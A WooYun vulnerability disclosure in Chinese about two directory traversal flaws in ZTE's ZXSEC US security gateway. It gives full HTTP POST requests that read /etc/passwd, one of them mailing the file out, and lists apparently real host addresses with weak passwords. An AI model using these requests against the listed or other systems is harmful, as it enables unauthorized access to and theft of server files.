当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101183

漏洞标题:中兴ZXSEC US统一安全网关系统存在两处任意文件

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2015-03-13 17:02

修复时间:2015-06-11 20:14

公开时间:2015-06-11 20:14

漏洞类型:任意文件遍历/下载

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-13: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向第三方安全合作伙伴开放
2015-05-07: 细节向核心白帽子及相关领域专家公开
2015-05-17: 细节向普通白帽子公开
2015-05-27: 细节向实习白帽子公开
2015-06-11: 细节向公众公开

简要描述:

rt

详细说明:

ZXSEC US 统一安全网关系统
由于没充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。
弱口令案例:

https://www.lngmxx.com/
https://60.13.3.21/
https://58.42.250.234/
https://120.195.49.238/
https://124.163.249.126/

漏洞证明:

第一处:

Image 7.jpg


第二处:

Image 6.jpg


Image 8.jpg


aaaaaaaaa11111111111.jpg


一处:

POST /cgi-bin/webapp?op=_zj_mrqcfib_pbq&filename=3 HTTP/1.1
Host: www.lngmxx.com
Connection: keep-alive
Content-Length: 55
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.lngmxx.com
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00
Content-Type: application/x-www-form-urlencoded
Referer: https://www.lngmxx.com/cgi-bin/webapp?op=_zj_mrqcfib_pelt&rname=config.cfg&fileid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SESSIONID=bfa4a2bad5a3894f020aff177266e1b1
way=0&txt_sfile=../../etc/passwd&submit3=%B5%BC%B3%F6++


第二处,需配置stmp服务

POST /cgi-bin/webapp?op=_zj_jxfi_pbka_pbq HTTP/1.1
Host: www.lngmxx.com
Connection: keep-alive
Content-Length: 777
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.lngmxx.com
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQLDwEXGyzfjgAgLG
Referer: https://www.lngmxx.com/cgi-bin/webapp?op=_zj_jxfi_pbka_pelt
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SESSIONID=bfa4a2bad5a3894f020aff177266e1b1
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="receiver_address"
邮箱地址@qq.com
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="subject"
test
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="content"
test
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="con_num"
4
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="type"
1
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="com_filetxt"
../../etc/passwd
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="com_file_value"
../../etc/passwd
------WebKitFormBoundaryQLDwEXGyzfjgAgLG--

修复方案:

你们懂的。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-13 20:13

厂商回复:

感谢~

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-20 00:52 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    前排占个位置 不要跟我抢

  2. 2015-04-21 17:37 | JXISTEC ( 路人 | Rank:4 漏洞数:1 | 江西省信息安全测评中心)

    这个漏洞的利用前提是不是需先登录这个安全设备?